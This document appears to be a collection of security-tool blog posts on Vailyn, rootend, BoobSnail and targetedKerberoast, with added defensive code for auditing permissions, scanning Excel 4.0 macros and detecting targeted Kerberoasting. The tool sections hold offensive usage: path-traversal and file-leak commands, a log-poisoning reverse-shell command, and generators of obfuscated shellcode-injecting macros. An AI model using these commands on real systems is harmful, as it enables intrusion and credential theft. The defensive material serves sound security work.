Vailyn currently supports 5 attack vectors, and provides a crawler to automate all of them. The attack performed is identified by the -a INT argument.

INT   attack
----  -------
1     query-based attack (https://site.com?file=../../../)
2     path-based attack (https://site.com/../../../)
3     cookie-based attack (will grab the cookies for you)
4     plain post data (ELEM1=VAL1&ELEM2=../../../)
5     json post data ({"file": "../../../"})
A     spider fetch + analyze all URLs from site using all vectors
P     partial spider fetch + analyze all URLs from site using only selected vectors

You also must specify a target to attack. This is done via -v VIC and -Pi VIC2, where -v is the part before the injection point, and -Pi the rest.

Example: if the final URL should look like: https://site.com/download.php?file=<ATTACK>&param2=necessaryvalue, you can specify -v https://site.com/download.php and -Pi &param2=necessaryvalue (and -p file, since this is a query attack).

If you want to include PHP wrappers in the scan (like php://filter), use the --lfi argument. At the end of Phase 1, you'll be presented with an additional selection menu containing the wrappers that worked (if any).

If the attacked site is behind a login page, you can supply an authentication cookie via -c COOKIE. If you want to attack over Tor, use --tor.


Phase 1

This is the analysis phase, where working payloads are separated from the others.

By default, /etc/passwd is looked up. If the server is not running Linux, you can specify a custom file by -i FILENAME. Note that you must include subdirectories in FILENAME. You can modify the lookup depth with the first value of -d (default=8). If you want to use absolute paths, set the first depth to 0.


Phase 2

This is the exploitation phase, where Vailyn will try to leak as many files as possible, or gain a reverse shell using various techniques.

The depth of lookup in phase 2 (the maximal number of layers traversed back) is specified by the second value of the -d argument. The level of subdirectory permutation is set by the third value of -d.

If you attack with absolute paths and perform the leak attack, set all depths to 0. If you want to gain a reverse shell, make sure that the second depth is greater than 0.

By specifying -l, Vailyn will not only display files on the terminal, but also download and save the files into the loot folder.

If you want verbose output (display every response, not only found files), you can use --debug. Note that the output gets really messy; this is basically just a debugging aid.

To perform the bruteforce attack, you need to specify -p2 leak FIL PATH, where

  • FIL is a dictionary file containing filenames only (e.g. index.php)
  • PATH, is a dictionary file containing directory names only. Vailyn will handle directory permutation for you, so you'll need only one directory per line.

To gain a reverse shell by code injection, you can use -p2 inject IP PORT, where

  • IP is your listening IP
  • PORT is the port you want to listen on.

WARNING

Vailyn employs Log Poisoning techniques. Therefore, YOUR SPECIFIED IP WILL BE VISIBLE IN THE SERVER LOGS.

The techniques (only work for LFI inclusions):

  • /proc/self/environ inclusion only works on outdated servers
  • Apache + Nginx Log Poisoning & inclusion
  • SSH Log Poisoning
  • poisoned mail inclusion
  • wrappers
    • expect://
    • data:// (plain & b64)
    • php://input

False Positive prevention

To distinguish real results from false positives, Vailyn does the following checks:

  • check the status code of the response
  • check if the response is identical to one taken before attack start: this is useful e.g., when the server returns 200, but ignores the payload input or returns a default page if the file is not found.
  • similar to #2, perform an additional check for query GET parameter handling (useful when server returns error that a needed parameter is missing)
  • check for empty responses
  • check if common error signatures are in the response content
  • check if the payload is contained in the response: this is an additional check for the case the server responds 200 for non-existing files, and reflects the payload in a message (like ../../secret not found)
  • check if the entire response is contained in the init check response: useful when the server has a default include which disappears in case of 404
  • for -a 2, perform an additional check if the response content matches the content from the server root URL
  • REGEX check for /etc/passwd if using that as lookup file

Examples
  • Simple Query attack, leaking files in Phase 2: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file --> http://site.com/download.php?file=../INJECT

  • Query attack, but I know a file file.php exists on exactly 2 levels above the inclusion point: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file -i file.php -d 2 X X -P This will shorten the duration of Phase 1 very much, since it's a targeted attack.

  • Simple Path attack: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs --> http://site.com/../INJECT

  • Path attack, but I need query parameters and tag: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs -Pi "?token=X#title" --> http://site.com/../INJECT?token=X#title

  • Simple Cookie attack: $ Vailyn -v "http://site.com/cookiemonster.php" -a 3 -p2 leak dicts/files dicts/dirs Will fetch cookies and you can select cookie you want to poison

  • POST Plain Attack: $ Vailyn -v "http://site.com/download.php" -a 4 -p2 leak dicts/files dicts/dirs -p "DATA1=xx&DATA2=INJECT" will infect DATA2 with the payload

  • POST JSON Attack: $ Vailyn -v "http://site.com/download.php" -a 5 -p2 leak dicts/files dicts/dirs -p '{"file": "INJECT"}'

  • Attack, but target is behind login screen: $ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar"

  • Attack, but I want a reverse shell on port 1337: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 inject MY.IP.IS.XX 1337 # a high Phase 2 Depth is needed for log injection (will start a ncat listener for you if on Unix)

  • Full automation in crawler mode: $ Vailyn -v "http://root-url.site" -a A you can also specify other args, like cookie, depths, lfi & lookup file here

  • Full automation, but Arjun needs --stable: $ Vailyn -v "http://root-url.site" -a A -s ANY


Demo

Vailyn's Crawler analyzing a damn vulnerable web application. LFI wrappers are not enabled.

GUI Demonstration (v2.2.1-5)


Possible Issues

Found some false positives/negatives (or want to point out other bugs/improvements): please leave an issue!


Code of Conduct

Vailyn is provided as an offensive web application audit tool. It has built-in functionalities which can reveal potential vulnerabilities in web applications, which could be exploited maliciously.

THEREFORE, NEITHER THE AUTHOR NOR THE CONTRIBUTORS ARE RESPONSIBLE FOR ANY MISUSE OR DAMAGE DUE TO THIS TOOLKIT.

By using this software, the user obliges to follow their local laws, to not attack someone else's system without explicit permission from the owner, or with malicious intent.

In case of an infringement, only the end user who committed it is accountable for their actions.


Credits & Copyright

Vailyn: Copyright © VainlyStrain

Arjun: Copyright © s0md3v

Arjun is no longer distributed with Vailyn. Install its latest version via pip.



Rootend - A *Nix Enumerator And Auto Privilege Escalation Tool

15 September 2021 at 11:30
By: Zion3R


rootend is a python *nix Enumerator & Auto Privilege Escalation tool.

For a full list of our tools, please visit our website https://www.twelvesec.com/

Written by:


Usage
rootend v.2.0.2 - Enumeration & Automation Privilege Escalation tool.
rootend is an open source tool licensed under GPLv3.
Affected systems: *nix.
Written by: @nickvourd of @twelvesec.
Special thanks to @maldevel & servo.
https://www.twelvesec.com/
Please visit https://github.com/twelvesec/rootend for more..

optional arguments:
-h, --help show this help message and exit
-v, --version show version and exit
-a, --auto automated privilege escalation process
-m, --manual system enumeration
-n, --nocolor disable color
-b, --banner show banner and exit
-s, --suid suid binary enumeration
-w, --weak weak permissions of files enumeration
-p, --php PHP configuration files enumeration
-c, --capabilities capabilities enumeration
-f, --full-writables world writable files enumeration

usage examples:
./rootend.py -a
./rootend.py -m
./rootend.py -v
./rootend.py -b

Specific categories usage examples:
./rootend.py -a -s
./rootend.py -m -w
./rootend.py -a -s -p
./rootend.py -m -w -c -p
./rootend.py -a -s -c -p -f

*Use the above arguments with -n to disable color.


Version

2.0.2

Supports
  • Python 2.x
  • Python 3.x

Tested on
  • Python 2.7.18rc1
  • Python 3.8.2

Modes
  • Manual
  • Auto

Exploitation Categories

Suid Binaries:
  • General Suids
  • Suids for reading files
  • Suids for creating file as root
  • Limited Suids
  • Custom Suids

Weak Permissions:
  • /etc/passwd
  • /etc/shadow
  • apache2.conf
  • httpd.conf
  • redis.conf
  • /root

Weak Ownership:
  • /etc/passwd
  • /etc/shadow
  • apache2.conf
  • httpd.conf
  • redis.conf
  • /root

Capabilities:
  • General Capabilities
  • Custom Capabilities
  • With CAP_SETUID

Interesting Files:
  • PHP Configuration Files
  • World Writable Files
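
The categories above (SUID binaries, weak permissions on sensitive files, world-writable files) are the same things a hardening audit checks from the other side. The block below is an added example, not rootend's code: it walks a tree for setuid/setgid and world-writable regular files and compares the ownership and mode of the sensitive files rootend names against an expected maximum. The expected modes are typical Debian-style defaults and are an assumption; the sample tree is constructed inside a temporary directory.

```python
"""Permission audit for the categories rootend enumerates above.

Added example, not rootend's code: lists setuid/setgid binaries and
world-writable files under a tree, and checks ownership and mode of the
sensitive files rootend names. Expected modes are typical distribution
defaults (an assumption); the sample tree is constructed.
"""
import os
import stat
import tempfile
from typing import Dict, Iterator, List, Tuple

# Widest acceptable mode for files rootend flags under "Weak Permissions"
# (assumption: Debian/Ubuntu defaults, shadow being root:shadow 0640).
EXPECTED_MAX_MODE = {
    "/etc/passwd": 0o644,
    "/etc/shadow": 0o640,
    "/etc/apache2/apache2.conf": 0o644,
    "/etc/redis/redis.conf": 0o640,
}


def regular_files(root: str) -> Iterator[Tuple[str, os.stat_result]]:
    """Yield (path, lstat) for regular files; unreadable directories are skipped."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st


def find_suid(root: str) -> List[str]:
    """Files carrying the setuid or setgid bit (rootend's "Suid Binaries")."""
    return sorted(p for p, st in regular_files(root)
                  if st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def find_world_writable(root: str) -> List[str]:
    """Files anyone may modify (rootend's "World Writable Files")."""
    return sorted(p for p, st in regular_files(root) if st.st_mode & stat.S_IWOTH)


def check_sensitive(expected: Dict[str, int] = EXPECTED_MAX_MODE) -> Dict[str, List[str]]:
    """Report files owned by a non-root user or carrying bits beyond the expected mode."""
    findings: Dict[str, List[str]] = {}
    for path, max_mode in expected.items():
        try:
            st = os.stat(path)
        except OSError:
            continue  # not installed on this host
        problems = []
        mode = stat.S_IMODE(st.st_mode)
        if mode & ~max_mode:
            problems.append(f"mode {mode:04o} exceeds {max_mode:04o}")
        if st.st_uid != 0:
            problems.append(f"owned by uid {st.st_uid}, expected root")
        if problems:
            findings[path] = problems
    return findings


def demo_tree() -> str:
    """Constructed tree: a fake setuid helper, a world-writable file, a clean file."""
    root = tempfile.mkdtemp(prefix="audit-")
    os.makedirs(os.path.join(root, "bin"))
    os.makedirs(os.path.join(root, "tmp"))
    for rel, mode in (("bin/helper", 0o4755), ("tmp/notes.txt", 0o666), ("bin/clean", 0o755)):
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = demo_tree()
    print("setuid/setgid:", find_suid(root))
    print("world-writable:", find_world_writable(root))
    print("sensitive:", check_sensitive())
```

Run against a real root (find_suid("/") and find_world_writable("/")) the lists are only useful diffed against a known-good baseline for the distribution, since many setuid binaries are legitimate; the value for a defender is in the ones that appear between two runs.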


BoobSnail - Allows Generating Excel 4.0 XLM Macro

14 September 2021 at 20:30
By: Zion3R


BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:

  • various infection techniques;
  • various obfuscation techniques;
  • translation of formulas into languages other than English;
  • can be used as a library - you can easily write your own generator.

Building and Running

Tested on: Python 3.8.7rc1

pip install -r requirements.txt
python boobsnail.py
Author: @_mzer0 @stm_cyber
(...)

Generators usage
python boobsnail.py <generator> -h

To display available generators type:

python boobsnail.py

Examples

Generate obfuscated macro that injects x64 or x86 shellcode:

python boobsnail.py Excel4NtDonutGenerator --inputx86 <PATH_TO_SHELLCODE> --inputx64 <PATH_TO_SHELLCODE> --out boobsnail.csv

Generate obfuscated macro that runs calc.exe:

python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv

Saving output in Excel
  1. Dump output to CSV file.
  2. Copy content of CSV file.
  3. Run Excel and create a new worksheet.
  4. Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
  5. Paste the content in cell A1 or R1C1.
  6. Click Data -> Text to Columns.
  7. Click Next -> Set Semicolon as separator and click Finish.

Library usage

BoobSnail ships the excel4lib library, which lets you build your own Excel4 macro generator. excel4lib contains a few classes that are useful when writing a generator:

  • excel4lib.macro.Excel4Macro - defines Excel4 formulas, values and variables;
  • excel4lib.macro.obfuscator.Excel4Obfuscator - obfuscates the instructions created in an Excel4Macro;
  • excel4lib.lang.Excel4Translator - translates formulas into another language.

The main idea of this library is to represent Excel4 formulas, variables, formula arguments and values as Python objects. That makes it easy to change instruction attributes such as formula or variable names, values and addresses. For example, let's create a simple macro that runs calc.exe:

from excel4lib.macro import *
# Create macro object
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=EXEC(cmd);

Now let's say that you want to obfuscate your macro. To do this you just need to import obfuscator and pass it to the Excel4Macro object:

from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

For now excel4lib ships two obfuscation classes:

  • excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc. to obfuscate your macro;
  • excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfuscate formulas.

You can also write your own obfuscator class and pass it to Excel4Macro in the same way.

Sometimes you will need to translate your macro into another language, for example your native language (in the author's case, Polish). With excel4lib this is easy: import the Excel4Translator class and call set_language:

from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Change language
Excel4Translator.set_language("pl_PL")
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);

For now only English and Polish are supported. To use another language you need to add translations in the excel4lib/lang/langs directory.

At some point you will need a formula that takes another formula as an argument. You can build one with the Excel4Macro.argument function:

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
macro.formula("EXEC", exec_arg)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));

As you can see, the ".exe" string was passed to the CONCATENATE formula as R2C1, the address of the ".exe" value (row 2, column 1). excel4lib returns references to formulas and values as addresses; references to variables are returned as their names. You have probably also noticed that Excel4Macro adds formulas, variables and values to the worksheet automatically, in the order in which the objects are created, starting at R1C1. To place formulas in another column or row, call the Excel4Macro.set_cords function:

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Column 1
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Column 2
# Change cords to column 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula("EXEC", exec_arg)
# Column 1
# Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
# GOTO EXEC call
macro.goto(exec_call)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;
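
BoobSnail is pitched at blue teams as well as red teams. As an added example that is not part of BoobSnail or excel4lib, the Python below scans a semicolon-separated macro dump of the kind shown throughout this section (the plain, translated and multi-column outputs) for functions that execute code, for the decoding and jump functions typical of obfuscated sheets, and for localised function names mapped back to English, which is what defeats a naive English-only signature once Excel4Translator is used. Only the Polish name of EXEC comes from the output above; the dangerous/suspicious function sets are chosen here, and every sample input, including the obfuscated one, is constructed.

```python
import re
from typing import Dict, List, Tuple

# Excel 4.0 functions that run code or load native code (English names).
DANGEROUS = {"EXEC", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL", "RUN"}
# Harmless alone, but typical of obfuscated XLM: runtime decoding and jumps into
# cells that were just written.
SUSPICIOUS = {"CHAR", "BITXOR", "MID", "GOTO"}
# Localised names mapped to English. URUCHOM.PROGRAM = EXEC is taken from the Polish
# output shown above; any further entries are assumptions to be filled in from the
# target locale's function list.
LOCALISED = {"URUCHOM.PROGRAM": "EXEC"}

# A function call: a name (letters, digits, dots; Unicode letters allowed because
# localised names may use them) followed by "(".
FUNC_RE = re.compile(r"([^\W\d][\w.]*)\s*\(")


def split_row(row: str, sep: str = ";") -> List[str]:
    """Split one CSV row on sep, ignoring separators inside double quotes."""
    cells, buf, quoted = [], [], False
    for ch in row:
        if ch == '"':
            quoted = not quoted
        if ch == sep and not quoted:
            cells.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    cells.append("".join(buf))
    return cells


def parse_macro_csv(text: str, sep: str = ";") -> List[Tuple[str, str]]:
    """(R1C1 address, cell text) for every non-empty cell, in sheet order."""
    out = []
    for r, row in enumerate(text.splitlines(), start=1):
        for c, cell in enumerate(split_row(row, sep), start=1):
            if cell.strip():
                out.append((f"R{r}C{c}", cell.strip()))
    return out


def scan(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Every cell is scanned, not only formulas: payload fragments such as
    "EXEC(" often sit in value cells and are assembled at run time."""
    report: Dict[str, List[Tuple[str, str]]] = {"dangerous": [], "suspicious": [], "localised": []}
    for addr, cell in parse_macro_csv(text):
        for name in FUNC_RE.findall(cell):
            name = name.upper()
            canonical = LOCALISED.get(name, name)
            if canonical != name:
                report["localised"].append((addr, name))
            if canonical in DANGEROUS:
                report["dangerous"].append((addr, name))
            elif canonical in SUSPICIOUS:
                report["suspicious"].append((addr, name))
    return report


def verdict(report: Dict[str, List[Tuple[str, str]]]) -> str:
    if report["dangerous"]:
        return "malicious-likely"
    if report["suspicious"]:
        return "review"
    return "clean"


# Constructed samples. The first three reproduce the outputs shown in this section;
# the fourth is a hand-written sheet in the style Excel4Obfuscator is described as
# producing (BITXOR/CHAR decoding, FORMULA writing a cell, GOTO into it).
SAMPLE_EN = 'cmd="calc.exe";\n=EXEC(cmd);\n'
SAMPLE_PL = 'cmd="calc.exe";\n=URUCHOM.PROGRAM(cmd);\n'
SAMPLE_MULTI = 'cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));\n.exe;;\n=GOTO(R1C2);;\n'
SAMPLE_OBF = '=FORMULA(CHAR(BITXOR(110,83))&"EXEC(""calc.exe"")",R3C1);\n=GOTO(R3C1);\n'

if __name__ == "__main__":
    for label, sample in [("en", SAMPLE_EN), ("pl", SAMPLE_PL), ("multi", SAMPLE_MULTI), ("obf", SAMPLE_OBF)]:
        rep = scan(sample)
        print(label, verdict(rep), rep)
```

The scanner works on the CSV text, not on a saved workbook, so it matches what BoobSnail emits before the "Saving output in Excel" steps; a real workbook would first need its macro sheet cells extracted.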

Author

mzer0 from stm_cyber team!


Articles

The first step in Excel 4.0 for Red Team

BoobSnail - Excel 4.0 macro generator



targetedKerberoast - Kerberoast With ACL Abuse Capabilities

14 September 2021 at 11:30
By: Zion3R


targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print "kerberoast" hashes for user accounts that have an SPN set. This tool brings the following additional feature: for each user without an SPN, it tries to set one (abusing a write permission on the servicePrincipalName attribute), prints the "kerberoast" hash, and deletes the temporary SPN it set for that operation. This is called targeted Kerberoasting. The tool can be run against all users of a domain, against a list of users supplied in a file, or against a single user given on the command line. Note that the temporary SPN write is a directory modification: where directory service changes are audited it is recorded even though the value is removed again immediately.

More information about this attack
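
As an added example that is not part of targetedKerberoast, the following Python shows the defender's view of the sequence the paragraph describes: an SPN value added to a user object (Security event 5136 with AttributeLDAPDisplayName servicePrincipalName), a service ticket requested for that user (event 4769), then the SPN value deleted again, all within a short window. The events are constructed samples using the field names those two event IDs carry; collecting 5136 at all requires the Directory Service Changes audit subcategory and a SACL on the user objects, which is an assumption about the environment.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# OperationType values carried by event 5136 (Directory Service Changes audit).
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"


@dataclass
class Event:
    time: datetime
    event_id: int
    fields: Dict[str, str]


def account_from_dn(dn: str) -> str:
    """'CN=svc_backup,OU=Service Accounts,DC=corp,DC=local' -> 'svc_backup'."""
    rdn = dn.split(",", 1)[0]
    return rdn.split("=", 1)[1].strip().lower()


def detect_targeted_kerberoast(events: List[Event],
                               window: timedelta = timedelta(minutes=10)) -> List[dict]:
    """Flag accounts where an SPN value was added, a service ticket for that account was
    then requested, and the SPN value was deleted again, all within `window`.
    A permanent SPN change (no delete) or an add/delete with no ticket request is ignored."""
    pending: Dict[str, dict] = {}   # account -> details of the outstanding SPN add
    findings: List[dict] = []
    for e in sorted(events, key=lambda ev: ev.time):
        if (e.event_id == 5136
                and e.fields.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"):
            acct = account_from_dn(e.fields["ObjectDN"])
            op = e.fields.get("OperationType")
            if op == VALUE_ADDED:
                pending[acct] = {"added": e.time, "subject": e.fields.get("SubjectUserName"),
                                 "spn": e.fields.get("AttributeValue"), "tgs": None, "etype": None}
            elif op == VALUE_DELETED and acct in pending:
                p = pending.pop(acct)
                if p["tgs"] is not None and e.time - p["added"] <= window:
                    findings.append({"account": acct, "subject": p["subject"], "spn": p["spn"],
                                     "etype": p["etype"],
                                     "seconds": (e.time - p["added"]).total_seconds()})
        elif e.event_id == 4769:
            # ServiceName is the account whose SPN the ticket was requested for.
            acct = e.fields.get("ServiceName", "").lower()
            if acct in pending and pending[acct]["tgs"] is None:
                pending[acct]["tgs"] = e.time
                pending[acct]["etype"] = e.fields.get("TicketEncryptionType")  # 0x17 = RC4-HMAC
    return findings


# Constructed sample events (not real log data).
T0 = datetime(2021, 9, 14, 11, 30, 0)
SVC_BACKUP_DN = "CN=svc_backup,OU=Service Accounts,DC=corp,DC=local"
SAMPLE_EVENTS = [
    Event(T0, 5136, {"SubjectUserName": "jdoe", "ObjectDN": SVC_BACKUP_DN,
                     "AttributeLDAPDisplayName": "servicePrincipalName",
                     "AttributeValue": "HTTP/pentest-xyz", "OperationType": VALUE_ADDED}),
    Event(T0 + timedelta(seconds=2), 4769, {"TargetUserName": "jdoe@CORP.LOCAL",
                                             "ServiceName": "svc_backup",
                                             "TicketEncryptionType": "0x17",
                                             "IpAddress": "::ffff:10.0.0.5"}),
    Event(T0 + timedelta(seconds=3), 5136, {"SubjectUserName": "jdoe", "ObjectDN": SVC_BACKUP_DN,
                                             "AttributeLDAPDisplayName": "servicePrincipalName",
                                             "AttributeValue": "HTTP/pentest-xyz",
                                             "OperationType": VALUE_DELETED}),
    # Benign: an admin registers a permanent SPN and a client later uses it. No delete
    # follows, so this must not be flagged.
    Event(T0 + timedelta(minutes=1), 5136, {"SubjectUserName": "admin",
                                             "ObjectDN": "CN=svc_sql,OU=Service Accounts,DC=corp,DC=local",
                                             "AttributeLDAPDisplayName": "servicePrincipalName",
                                             "AttributeValue": "MSSQLSvc/db01.corp.local:1433",
                                             "OperationType": VALUE_ADDED}),
    Event(T0 + timedelta(minutes=2), 4769, {"TargetUserName": "appuser@CORP.LOCAL",
                                             "ServiceName": "svc_sql",
                                             "TicketEncryptionType": "0x12",
                                             "IpAddress": "::ffff:10.0.0.20"}),
]

if __name__ == "__main__":
    for f in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print(f"{f['subject']} roasted {f['account']} via temporary SPN {f['spn']} "
              f"(etype {f['etype']}, {f['seconds']:.0f}s add-to-delete)")
```

The add, ticket request and delete come from the same subject within seconds, which is the shape of the tool's --only-abuse path; the encryption type is recorded rather than required, since the defender cares about the SPN flapping whether or not RC4 was obtained.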


Usage

The tool supports the authentication methods listed under "secrets" in the help output below: a plaintext password, NT/LM hashes, Kerberos credentials from a .ccache file, or an AES key.

Among other things, targetedKerberoast supports multi-level verbosity, just append -v, -vv, ... to the command :)

usage: targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER]
[-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]

Queries target domain for SPNs that are running under a user account and operate targeted Kerberoasting

optional arguments:
-h, --help show this help message and exit
-v, --verbose verbosity level (-v for verbose, -vv for debug)
-q, --quiet show no information at all
-D TARGET_DOMAIN, --target-domain TARGET_DOMAIN
Domain to query/request if different than the domain of the user. Allows for Kerberoasting across trusts.
-U USERS_FILE, --users-file USERS_FILE
File with user per line to test
--request-user username
Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
-o OUTPUT_FILE, --output-file OUTPUT_FILE
Output filename to write ciphers in JtR/hashcat format
--use-ldaps Use LDAPS instead of LDAP
--only-abuse Ignore accounts that already have an SPN and focus on targeted Kerberoasting
--no-abuse Don't attempt targeted Kerberoasting

authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with

secrets:
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
--no-pass don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)

The original post shows an example run as a screen capture, which is not reproduced here.


Credits and references

Credits to the whole team behind Impacket and its contributors.


